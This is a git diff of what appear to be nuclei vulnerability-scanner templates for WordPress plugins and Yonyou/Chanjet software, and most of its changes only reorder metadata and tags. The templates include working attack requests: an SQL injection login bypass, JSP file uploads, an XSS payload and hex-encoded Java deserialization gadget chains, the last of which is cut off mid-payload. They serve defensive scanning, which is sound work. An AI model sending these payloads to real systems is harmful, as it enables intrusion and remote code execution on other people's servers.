a/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml index 486ea6b4f7..079be6041b 100644 --- a/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 - tags: wordpress,ssrf,oast,xmlrpc metadata: max-request: 1 + tags: wordpress,ssrf,oast,xmlrpc http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-xmlrpc.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc.yaml index 5578fd80df..980e5e13fd 100644 --- a/http/vulnerabilities/wordpress/wp-xmlrpc.yaml +++ b/http/vulnerabilities/wordpress/wp-xmlrpc.yaml @@ -4,14 +4,15 @@ info: name: WordPress xmlrpc author: udit_thakkur severity: info - tags: wordpress metadata: max-request: 1 + tags: wordpress http: - method: GET path: - "{{BaseURL}}/xmlrpc.php" + matchers: - type: word words: diff --git a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml index 8694f20a66..4d77718496 100644 --- a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml +++ b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml @@ -7,8 +7,8 @@ info: reference: - https://developer.yoast.com/features/xml-sitemaps/functional-specification/ metadata: - max-request: 1 verified: true + max-request: 1 google-dork: inurl:"/author-sitemap.xml" tags: wp,wp-plugin,wordpress,username,disclosure diff --git a/http/vulnerabilities/wordpress/wpdm-cache-session.yaml b/http/vulnerabilities/wordpress/wpdm-cache-session.yaml index 4bfd9f2db5..8d64f71945 100644 --- a/http/vulnerabilities/wordpress/wpdm-cache-session.yaml +++ b/http/vulnerabilities/wordpress/wpdm-cache-session.yaml @@ -6,14 +6,15 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/7004 - tags: wordpress,edb metadata: max-request: 1 + tags: wordpress,edb http: - method: GET path: - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' + matchers-condition: and matchers: - type: word @@ -22,8 +23,8 @@ http: - ".txt" - "wpdm-cache" condition: and - part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml index e3e09c2dcf..ab35584135 100644 --- a/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml +++ b/http/vulnerabilities/wordpress/wpify-woo-czech-xss.yaml @@ -12,8 +12,8 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 verified: true + max-request: 1 tags: wp,wordpress,xss,wp-plugin,wpify,wpscan http: diff --git a/http/vulnerabilities/wordpress/wpml-xss.yaml b/http/vulnerabilities/wordpress/wpml-xss.yaml index d872619157..a22311b151 100644 --- a/http/vulnerabilities/wordpress/wpml-xss.yaml +++ b/http/vulnerabilities/wordpress/wpml-xss.yaml @@ -6,14 +6,14 @@ info: severity: medium description: | WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter. + remediation: | + Update the WPML plugin to 4.6.1 version. reference: - https://wpml.org/fr/changelog/2023/03/wpml-4-6-1-important-security-update/ - https://twitter.com/bug_vs_me/status/1652789903766200320 - remediation: | - Update the WPML plugin to 4.6.1 version. metadata: - max-request: 1 verified: true + max-request: 1 tags: xss,wp,wordpress,wpml,wp-plugin http: @@ -37,4 +37,4 @@ http: extractors: - type: dsl dsl: - - 'host + "/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(domain)%0c"' \ No newline at end of file + - 'host + "/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(domain)%0c"' diff --git a/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml b/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml index 5b1ac6b936..60360b22cc 100644 --- a/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml +++ b/http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml @@ -6,14 +6,15 @@ info: severity: medium reference: - https://www.exploit-db.com/ghdb/6443 - tags: wordpress,edb metadata: max-request: 1 + tags: wordpress,edb http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wpmudev-updates/keys/' + matchers-condition: and matchers: - type: word @@ -22,8 +23,8 @@ http: - ".pub" - "wpmudev" condition: and - part: body + - type: status status: - 200 diff --git a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml index b98e4d5ff1..9203d106cc 100644 --- a/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml +++ b/http/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: wp-plugin,redirect,wordpress metadata: max-request: 1 + tags: wp-plugin,redirect,wordpress http: - method: GET diff --git a/http/vulnerabilities/wordpress/wptouch-xss.yaml b/http/vulnerabilities/wordpress/wptouch-xss.yaml index 0185598b0f..0ddb9bd743 100644 --- a/http/vulnerabilities/wordpress/wptouch-xss.yaml +++ b/http/vulnerabilities/wordpress/wptouch-xss.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 - tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan metadata: max-request: 2 + tags: wp-plugin,wp,wordpress,xss,authenticated,wptouch,wpscan http: - raw: @@ -25,12 +25,12 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/admin.php?page=wptouch-admin-license&a%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml index b06399b3c7..f92ca10872 100644 --- a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability. + remediation: Fixed in version 2.2.0 reference: - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5 - https://wordpress.org/plugins/zero-spam/ - remediation: Fixed in version 2.2.0 metadata: - max-request: 1 verified: true - tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth + max-request: 1 + tags: wpscan,wp,wp-plugin,wordpress,zero-spam,sqli,unauth http: - raw: diff --git a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml index eda14230b5..ad85aaac1e 100755 --- a/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml @@ -9,9 +9,9 @@ info: reference: | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 2 fofa-query: body="远程通CHANJET_Remote" - verified: true tags: yonyou,chanjet,sqli http: @@ -23,7 +23,6 @@ http: Accept-Encoding: gzip username=%22'%20or%201%3d1%3b%22&password=%018d8cbc8bfc24f018&ClientStatus=1 - - | POST /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl HTTP/1.1 Host: {{Hostname}} @@ -42,4 +41,4 @@ http: - type: word part: body_2 words: - - "{\"RetCode\":2}" \ No newline at end of file + - "{\"RetCode\":2}" diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml index 95466bb07a..93d1c4e46c 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E7%94%A8%E5%8F%8B%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="畅捷通-TPlus" tags: chanjet,tplus,sqli @@ -40,4 +40,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml index b5c811de8b..1cfce14474 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 1 fofa-query: app="畅捷通-TPlus" - verified: true tags: yonyou,chanjet,lfi,tplus http: @@ -31,4 +31,4 @@ http: - type: word part: header words: - - "application/octet-stream" \ No newline at end of file + - "application/octet-stream" diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml index 9148cec707..6fec1ace31 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md metadata: + verified: true max-request: 2 fofa-query: app="畅捷通-TPlus" - verified: true tags: yonyou,chanjet,upload,intrusive http: @@ -28,7 +28,6 @@ http: {{randstr_2}} ------WebKitFormBoundaryuirnbcvo-- - - | GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1 Host: {{Hostname}} @@ -40,4 +39,4 @@ http: dsl: - "status_code_1==200 && status_code_2==200" - "contains(body_2, '{{randstr_2}}')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml index 1a2410251b..cc047ea5e6 100755 --- a/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml +++ b/http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20Plus%20%E5%AE%A1%E8%AE%A1%20%EF%BC%88%E8%B6%85%E8%AF%A6%E7%BB%86%EF%BC%89.md metadata: + verified: true max-request: 1 fofa-query: app="畅捷通-TPlus" - verified: true tags: yonyou,chanjet,sqli http: @@ -31,4 +31,4 @@ http: - "0x06d49632c9dc9bcb62aeaef99612ba6b" - "Message\":\"245" - "DatabaseException" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml index eccc4fbe4a..ff4c70de39 100644 --- a/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,erp-nc metadata: max-request: 1 + tags: lfi,erp-nc http: - method: GET diff --git a/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml index c04b608af5..f2b01ae549 100755 --- a/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml +++ b/http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml @@ -9,9 +9,9 @@ info: reference: - https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag metadata: + verified: true max-request: 2 fofa-query: title="用友GRP-U8行政事业内控管理软件" - verified: true tags: yonyou,fileupload,grp,intrusive http: @@ -34,7 +34,6 @@ http: submit ------WebKitFormBoundaryqoqnjtcw-- - - | GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1 Host: {{Hostname}} @@ -46,4 +45,4 @@ http: dsl: - "status_code_1 == 200 && contains(body_1,'showSucceedMsg')" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml index eeb895f61d..c7e1a71813 100644 --- a/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml +++ b/http/vulnerabilities/yonyou/wooyun-path-traversal.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: lfi,wooyun metadata: max-request: 1 + tags: lfi,wooyun http: - method: GET @@ -26,6 +26,7 @@ http: - type: status status: - 200 + - type: word words: - diff --git a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml index a34ef33d12..3fed5f48ad 100755 --- a/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml +++ b/http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: FE协作 - max-request: 1 verified: true + max-request: 1 + fofa-query: FE协作 tags: yonyou,fe,lfi http: @@ -29,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml index 4e26984d81..8ee60ffc2d 100755 --- a/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml @@ -9,11 +9,10 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-arbitrary-file-upload.yaml metadata: - fofa-query: app="用友-UFIDA-NC" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="用友-UFIDA-NC" tags: yonyou,file-upload,intrusive - variables: file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp" file_content: "{{randstr}}" @@ -26,7 +25,6 @@ http: Content-Type: multipart/form-data; {{hex_decode("ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C7708000000100000000274000946494C455F4E414D45740009")}}{{file_name}}{{hex_decode("7400105441524745545F46494C455F504154487400102E2F776562617070732F6E635F77656278")}}{{file_content}} - - | GET /{{file_name}} HTTP/1.1 Content-Type: application/x-www-form-urlencoded @@ -38,4 +36,4 @@ http: dsl: - "status_code_1 == 200 && status_code_2 == 200" - "contains(body_2, '{{file_content}}')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml index 2474a6d4e8..00d29a84a2 100755 --- a/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml +++ b/http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml @@ -10,7 +10,6 @@ info: metadata: max-request: 1 tags: yonyou,grp,xxe,sqli - variables: num1: "{{rand_int(800000, 999999)}}" num2: "{{rand_int(800000, 999999)}}" @@ -35,4 +34,4 @@ http: - type: word words: - - "" \ No newline at end of file + - "" diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index 6c272f87c7..e2c56e34af 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -10,9 +10,9 @@ info: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd metadata: + verified: true max-request: 2 fofa-query: icon_hash="1085941792" - verified: true tags: yonyou,nc,intrusive,fileupload http: @@ -34,7 +34,6 @@ http: \webapps\nc_web\{{randstr_3}}.jsp -----------------------------16314487820932200903769468567-- - - | GET /{{randstr_3}}.jsp HTTP/1.1 Host: {{Hostname}} @@ -47,4 +46,4 @@ http: dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml index 1d9799f595..48fc675588 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="Yonyou-UFIDA-NC" - tags: yonyou,nc,fileupload,baseapp,deserialization + tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive http: - method: GET @@ -23,4 +23,4 @@ http: - type: dsl dsl: - 'status_code_1 == 200 && contains_all(body_1,"java.io","EOFExceptionYI")' - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml index 15bf2069d3..bdf7d479c1 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md metadata: - fofa-query: icon_hash="1085941792" - max-request: 2 verified: true + max-request: 2 + fofa-query: icon_hash="1085941792" tags: yonyou,intrusive,fileupload http: @@ -23,7 +23,6 @@ http: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 {{hex_decode("0000015C7271890390CEA362632F6E8819F73AC2FA807D6CAF41AE772EC2DF10A2AB43A4C7BAF2C7F57909B2C19D6CF5DE6E565331E70CB3C2E70A3AF6D1E3C4480035F870288D440C41742E3EC659DA538CC3CAA2AE86569D62D002D8CE52D7D184BE7556F95C7567C1AC40FDD7502AF38BAE48C14D6A4F473779542BD7D1072973C4CD093C6BC1D0266BE82F15EEB96D146BAF89297059448A2EDDDF63463984FFC2247032EAD18E03422B87A8CC01E651A50DD09A1DE3C87ED376B43366DE024EE3880B7006A56DF97073A7472B444FF53433DD0AE63758FEB43A808B49DA0CB5B23783C3DE07C5182D35CD467D9CA2081B47EB7F604E84A1B7DA7E665A2B5D6B04F94C838AF6AE6E4829304C2D750A0A1400860F9D7611BA8DEA77AE8C79AD44F90C55A74DD3D06D27B5F3A583E8C3FCC27FC8C9B660F0C3B52B76DB7B3A0B87D04FE98DF57D2851FD93F40D04A3DA14C658E5BCBD9DCB74E35AB50818EF")}} - - | GET /ncupload/n2d19a.jsp HTTP/1.1 Host: {{Hostname}} @@ -34,4 +33,4 @@ http: dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'just_a_test')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml index dd24e1b370..c6ffb3c825 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml @@ -10,11 +10,10 @@ info: - https://www.seebug.org/vuldb/ssvid-99547 - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py metadata: + verified: true max-request: 2 fofa-query: app="用友-UFIDA-NC - verified: true tags: yonyou,intrusive,ufida,fileupload - variables: v1: "{{rand_int(1,100)}}" @@ -31,7 +30,6 @@ http: <%out.println("{{randstr_2}}");%> ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7-- - - | GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1 Host: {{Hostname}} @@ -42,4 +40,4 @@ http: dsl: - "status_code_1 == 200" - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" - condition: and \ No newline at end of file + condition: and diff --git a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml index f7129e7f08..d5171adb07 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml @@ -10,9 +10,9 @@ info: - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py metadata: + verified: true max-request: 1 fofa-query: app="用友-UFIDA-NC - verified: true tags: yonyou,nc,exposure http: @@ -30,4 +30,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml index fd6c9c0607..2207d744a7 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml metadata: + verified: true max-request: 2 fofa-query: app="用友-UFIDA-NC - verified: true - tags: yonyou,rce,deserialization,rce + tags: yonyou,rce,deserialization http: - raw: @@ -24,7 +24,6 @@ http: Accept-Encoding: gzip, deflate {{hex_decode('ACED0005737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B78707400007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000027372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E0003787076720037636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E5472415846696C746572000000000000000000000078707372003E6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E7374616E74696174655472616E73666F726D6572348BF47FA486D03B0200025B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C020000787000000001737200296F72672E6170616368652E78616C616E2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000749000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465784C000B5F617578436C617373657374002A4C6F72672F6170616368652F78616C616E2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C61737371007E00154C00055F6E616D657400124C6A6176612F6C616E672F537472696E673B4C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF70757200035B5B424BFD19156767DB37020000787000000001757200025B42ACF317F8060854E0020000787000000EF1CAFEBABE0000003200E30A0003000F0700DE0700120100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B01000A536F7572636546696C6501000C476164676574732E6A6176610C0004000507001301003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61640100106A6176612F6C616E672F4F626A65637401001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100106A6176612F6C616E672F54687265616407001501000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B0C001700180A0016001901000E67657454687265616447726F757001001928294C6A6176612F6C616E672F54687265616447726F75703B0C001B001C0A0016001D010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0C001F00200A000300210100077468726561647308002301000F6A6176612F6C616E672F436C6173730700250100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0C002700280A002600290100226A6176612F6C616E672F7265666C6563742F41636365737369626C654F626A65637407002B01000D73657441636365737369626C65010004285A29560C002D002E0A002C002F0100176A6176612F6C616E672F7265666C6563742F4669656C64070031010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0C003300340A003200350100135B4C6A6176612F6C616E672F5468726561643B0700370100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B0C0039003A0A0016003B0100046578656308003D0100106A6176612F6C616E672F537472696E6707003F010008636F6E7461696E7301001B284C6A6176612F6C616E672F4368617253657175656E63653B295A0C004100420A00400043010004687474700800450100067461726765740800470100126A6176612F6C616E672F52756E6E61626C6507004901000674686973243008004B01000768616E646C657208004D01001E6A6176612F6C616E672F4E6F537563684669656C64457863657074696F6E07004F01000D6765745375706572636C6173730C005100200A00260052010006676C6F62616C08005401000A70726F636573736F727308005601000E6A6176612F7574696C2F4C69737407005801000473697A650100032829490C005A005B0B0059005C0100152849294C6A6176612F6C616E672F4F626A6563743B0C0033005E0B0059005F01000372657108006101000B676574526573706F6E73650800630100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0C006500660A00260